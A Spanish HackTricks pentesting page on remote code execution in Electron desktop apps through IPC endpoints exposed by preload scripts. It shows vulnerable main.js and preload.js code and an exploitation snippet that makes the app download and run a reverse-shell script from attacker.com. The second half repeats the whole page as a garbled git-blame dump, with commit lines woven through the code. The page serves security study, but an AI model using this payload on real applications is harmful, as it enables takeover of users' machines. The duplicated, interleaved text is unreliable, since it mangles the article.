hacktricks/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-ipc.md

<details>

<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si deseas ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>


Si el script de precarga expone un punto de conexión IPC desde el archivo `main.js`, el proceso de renderizado podrá acceder a él y, si es vulnerable, podría ser posible una RCE.

**Todos estos ejemplos fueron tomados de aquí** [**https://www.youtube.com/watch?v=xILfQGkLXQo**](https://www.youtube.com/watch?v=xILfQGkLXQo). Consulta el video para obtener más información.

# Ejemplo 1

Verifica cómo `main.js` escucha en `getUpdate` y **descargará y ejecutará cualquier URL** pasada.\
Verifica también cómo `preload.js` **expone cualquier evento IPC** desde el main.
```javascript
// Part of code of main.js
ipcMain.on('getUpdate', (event, url) => {
console.log('getUpdate: ' + url)
mainWindow.webContents.downloadURL(url)
mainWindow.download_url = url
});

mainWindow.webContents.session.on('will-download', (event, item, webContents) => {
console.log('downloads path=' + app.getPath('downloads'))
console.log('mainWindow.download_url=' + mainWindow.download_url);
url_parts = mainWindow.download_url.split('/')
filename = url_parts[url_parts.length-1]
mainWindow.downloadPath = app.getPath('downloads') + '/' + filename
console.log('downloadPath=' + mainWindow.downloadPath)
// Set the save path, making Electron not to prompt a save dialog.
item.setSavePath(mainWindow.downloadPath)

item.on('updated', (event, state) => {
if (state === 'interrupted') {
console.log('Download is interrupted but can be resumed')
}
else if (state === 'progressing') {
if (item.isPaused()) console.log('Download is paused')
else console.log(`Received bytes: ${item.getReceivedBytes()}`)
}
})

item.once('done', (event, state) => {
if (state === 'completed') {
console.log('Download successful, running update')
fs.chmodSync(mainWindow.downloadPath, 0755);
var child = require('child_process').execFile;
child(mainWindow.downloadPath, function(err, data) {
if (err) { console.error(err); return; }
console.log(data.toString());
});
}
else console.log(`Download failed: ${state}`)
})
})
```

```javascript
// Part of code of preload.js
window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};
```
Explotación:
```html
<script>
electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");
</script>
```
# Ejemplo 2

Si el script de precarga se expone directamente al renderizador de una forma de llamar a shell.openExternal, es posible obtener RCE.
```javascript
// Part of preload.js code
window.electronOpenInBrowser = (url) => {
shell.openExternal(url);
};
```
# Ejemplo 3

Si el script de precarga expone formas de comunicarse completamente con el proceso principal, un XSS podrá enviar cualquier evento. El impacto de esto depende de lo que el proceso principal expone en términos de IPC.
```javascript
window.electronListen = (event, cb) => {
ipcRenderer.on(event, cb);
};

window.electronSend = (event, data) => {
ipcRenderer.send(event, data);
};
```
<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Experto en Equipos Rojos de AWS de HackTricks)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Obtén el [**swag oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Comparte tus trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00			`<details>`

Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			`<summary><strong>Aprende hacking en AWS desde cero hasta experto con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00
Translated ['network-services-pentesting/pentesting-printers/cross-site- 2024-01-08 12:43:59 +00:00			`Otras formas de apoyar a HackTricks:`
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			`* Si deseas ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
			`* Obtén el [oficial PEASS & HackTricks swag](https://peass.creator-spring.com)`
			`* Descubre [The PEASS Family](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			`* Comparte tus trucos de hacking enviando PRs a los [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.`
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00
			`</details>`


Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			Si el script de precarga expone un punto de conexión IPC desde el archivo `main.js`, el proceso de renderizado podrá acceder a él y, si es vulnerable, podría ser posible una RCE.
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			`Todos estos ejemplos fueron tomados de aquí [https://www.youtube.com/watch?v=xILfQGkLXQo](https://www.youtube.com/watch?v=xILfQGkLXQo). Consulta el video para obtener más información.`
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00
			`# Ejemplo 1`

Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			Verifica cómo `main.js` escucha en `getUpdate` y descargará y ejecutará cualquier URL pasada.\
			Verifica también cómo `preload.js` expone cualquier evento IPC desde el main.
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00			```javascript
			`// Part of code of main.js`
			`ipcMain.on('getUpdate', (event, url) => {`
			`console.log('getUpdate: ' + url)`
			`mainWindow.webContents.downloadURL(url)`
			`mainWindow.download_url = url`
			`});`

			`mainWindow.webContents.session.on('will-download', (event, item, webContents) => {`
			`console.log('downloads path=' + app.getPath('downloads'))`
			`console.log('mainWindow.download_url=' + mainWindow.download_url);`
			`url_parts = mainWindow.download_url.split('/')`
			`filename = url_parts[url_parts.length-1]`
			`mainWindow.downloadPath = app.getPath('downloads') + '/' + filename`
			`console.log('downloadPath=' + mainWindow.downloadPath)`
			`// Set the save path, making Electron not to prompt a save dialog.`
			`item.setSavePath(mainWindow.downloadPath)`

			`item.on('updated', (event, state) => {`
			`if (state === 'interrupted') {`
			`console.log('Download is interrupted but can be resumed')`
			`}`
			`else if (state === 'progressing') {`
			`if (item.isPaused()) console.log('Download is paused')`
			else console.log(`Received bytes: ${item.getReceivedBytes()}`)
			`}`
			`})`

			`item.once('done', (event, state) => {`
			`if (state === 'completed') {`
			`console.log('Download successful, running update')`
			`fs.chmodSync(mainWindow.downloadPath, 0755);`
			`var child = require('child_process').execFile;`
			`child(mainWindow.downloadPath, function(err, data) {`
			`if (err) { console.error(err); return; }`
			`console.log(data.toString());`
			`});`
			`}`
			else console.log(`Download failed: ${state}`)
			`})`
			`})`
			```

			```javascript
			`// Part of code of preload.js`
			`window.electronSend = (event, data) => {`
			`ipcRenderer.send(event, data);`
			`};`
			```
			`Explotación:`
			```html
			`<script>`
			`electronSend("getUpdate","https://attacker.com/path/to/revshell.sh");`
			`</script>`
			```
			`# Ejemplo 2`

Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`Si el script de precarga se expone directamente al renderizador de una forma de llamar a shell.openExternal, es posible obtener RCE.`
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00			```javascript
			`// Part of preload.js code`
			`window.electronOpenInBrowser = (url) => {`
			`shell.openExternal(url);`
			`};`
			```
			`# Ejemplo 3`

Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			`Si el script de precarga expone formas de comunicarse completamente con el proceso principal, un XSS podrá enviar cualquier evento. El impacto de esto depende de lo que el proceso principal expone en términos de IPC.`
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00			```javascript
			`window.electronListen = (event, cb) => {`
			`ipcRenderer.on(event, cb);`
			`};`

			`window.electronSend = (event, data) => {`
			`ipcRenderer.send(event, data);`
			`};`
			```
			`<details>`

Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Experto en Equipos Rojos de AWS de HackTricks)</strong></a><strong>!</strong></summary>`
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00
Translated ['network-services-pentesting/pentesting-printers/cross-site- 2024-01-08 12:43:59 +00:00			`Otras formas de apoyar a HackTricks:`
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			`* Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF Consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Obtén el [swag oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
Translated ['network-services-pentesting/11211-memcache/README.md', 'net 2024-02-09 08:54:51 +00:00			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
Translated ['forensics/basic-forensic-methodology/partitions-file-system 2024-02-05 02:44:49 +00:00			`* Comparte tus trucos de hacking enviando PRs a los [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.`
Translated ['linux-hardening/privilege-escalation/electron-cef-chromium- 2023-10-27 16:24:02 +00:00
			`</details>`